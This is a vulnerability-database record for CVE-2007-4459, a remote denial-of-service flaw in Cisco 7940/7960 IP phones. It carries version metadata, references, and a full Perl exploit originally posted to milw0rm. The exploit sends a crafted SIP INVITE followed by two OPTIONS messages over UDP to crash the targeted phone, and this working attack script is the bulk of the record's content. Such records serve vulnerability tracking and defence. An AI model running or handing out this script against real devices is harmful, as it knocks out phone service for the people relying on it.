ID

VAR-E-200708-0246


CVE

cve_id:CVE-2007-4459

Trust: 1.3

sources: BID: 25378 // EXPLOIT-DB: 4297

EDB ID

4297


TITLE

Cisco IP Phone 7940 - 3 SIP Messages Remote Denial of Service - Hardware dos Exploit

Trust: 0.6

sources: EXPLOIT-DB: 4297

DESCRIPTION

Cisco IP Phone 7940 - 3 SIP Messages Remote Denial of Service. CVE-2007-4459 . dos exploit for Hardware platform

Trust: 0.6

sources: EXPLOIT-DB: 4297

AFFECTED PRODUCTS

vendor:ciscomodel:ip phonescope:eqversion:7940

Trust: 1.0

vendor:ciscomodel:voip phone cp-7960scope:eqversion:3.2

Trust: 0.3

vendor:ciscomodel:voip phone cp-7960scope:eqversion:3.1

Trust: 0.3

vendor:ciscomodel:voip phone cp-7960scope:eqversion:3.0

Trust: 0.3

vendor:ciscomodel:voip phone cp-7960scope:eqversion:8.6(0)

Trust: 0.3

vendor:ciscomodel:voip phone cp-7940scope:eqversion:3.2

Trust: 0.3

vendor:ciscomodel:voip phone cp-7940scope:eqversion:3.1

Trust: 0.3

vendor:ciscomodel:voip phone cp-7940scope:eqversion:3.0

Trust: 0.3

vendor:ciscomodel:voip phone cp-7940scope:eqversion:8.6(0)

Trust: 0.3

vendor:ciscomodel:voip phone cp-7960scope:neversion:8.7(0)

Trust: 0.3

vendor:ciscomodel:voip phone cp-7940scope:neversion:8.7(0)

Trust: 0.3

sources: BID: 25378 // EXPLOIT-DB: 4297

EXPLOIT

#!/usr/bin/perl
use IO::Socket::INET;

die "Usage $0 <dst> <port> <username>" unless ($ARGV[2]);

$socket=new IO::Socket::INET->new(PeerPort=>$ARGV[1],

Proto=>'udp',

PeerAddr=>$ARGV[0]);

$msg = "INVITE sip:$ARGV[2]\@$ARGV[0] SIP/2.0\r\nVia: SIP/2.0/UDP\t192.168.1.2;rport;branch=00\r\nFrom: <sip:gasparin\@192.168.1.2>;tag=00\r\nTo: <sip:$ARGV[2]\@$ARGV[0]>;tag=00\r\nCall-ID: et\@192.168.1.2\r\nCSeq: 10 INVITE\r\nContent-Length: 0\r\n\r\n";;

$socket->send($msg);

sleep(1);

$msg ="OPTIONS sip:$ARGV[2]\@$ARGV[0] SIP/2.0\r\nVia: SIP/2.0/UDP 192.168.1.2;rport;branch=01\r\nFrom: <sip:gasparin\@192.168.1.2>;tag=01\r\nTo: <sip:$ARGV[2]\@$ARGV[0]>\r\nCall-ID: et\@192.168.1.2\r\nCSeq: 11 OPTIONS\r\nContent-Length: 0\r\n\r\n";

$socket->send($msg);

sleep(1);

$msg ="OPTIONS sip:$ARGV[2]\@$ARGV[0] SIP/2.0\r\nVia: SIP/2.0/UDP 192.168.1.2;rport;branch=02\r\nFrom: <sip:gasparin\@192.168.1.2>;tag=02\r\nTo: <sip:$ARGV[2]\@$ARGV[0]>\r\nCall-ID: et\@192.168.1.2\r\nCSeq: 12 OPTIONS\r\nContent-Length: 0\r\n\r\n";

$socket->send($msg);

# milw0rm.com [2007-08-21]

Trust: 1.0

sources: EXPLOIT-DB: 4297

EXPLOIT LANGUAGE

pl

Trust: 0.6

sources: EXPLOIT-DB: 4297

PRICE

free

Trust: 0.6

sources: EXPLOIT-DB: 4297

TYPE

3 SIP Messages Remote Denial of Service

Trust: 1.0

sources: EXPLOIT-DB: 4297

CREDITS

MADYNES

Trust: 0.6

sources: EXPLOIT-DB: 4297

EXTERNAL IDS

db:EXPLOIT-DBid:4297

Trust: 1.6

db:NVDid:CVE-2007-4459

Trust: 1.3

db:EDBNETid:28617

Trust: 0.6

db:BIDid:25378

Trust: 0.3

sources: BID: 25378 // EXPLOIT-DB: 4297 // EDBNET: 28617

REFERENCES

url:https://nvd.nist.gov/vuln/detail/cve-2007-4459

Trust: 1.0

url:https://www.exploit-db.com/exploits/4297/

Trust: 0.6

url:http://www.cisco.com/en/us/products/products_security_response09186a00808a6693.html

Trust: 0.3

url:http://www.cisco.com/en/us/products/hw/phones/ps379/index.html

Trust: 0.3

sources: BID: 25378 // EXPLOIT-DB: 4297 // EDBNET: 28617

SOURCES

db:BIDid:25378
db:EXPLOIT-DBid:4297
db:EDBNETid:28617

LAST UPDATE DATE

2022-07-27T09:17:11.644000+00:00


SOURCES UPDATE DATE

db:BIDid:25378date:2015-04-16T18:09:00

SOURCES RELEASE DATE

db:BIDid:25378date:2007-08-20T00:00:00
db:EXPLOIT-DBid:4297date:2007-08-21T00:00:00
db:EDBNETid:28617date:2007-08-21T00:00:00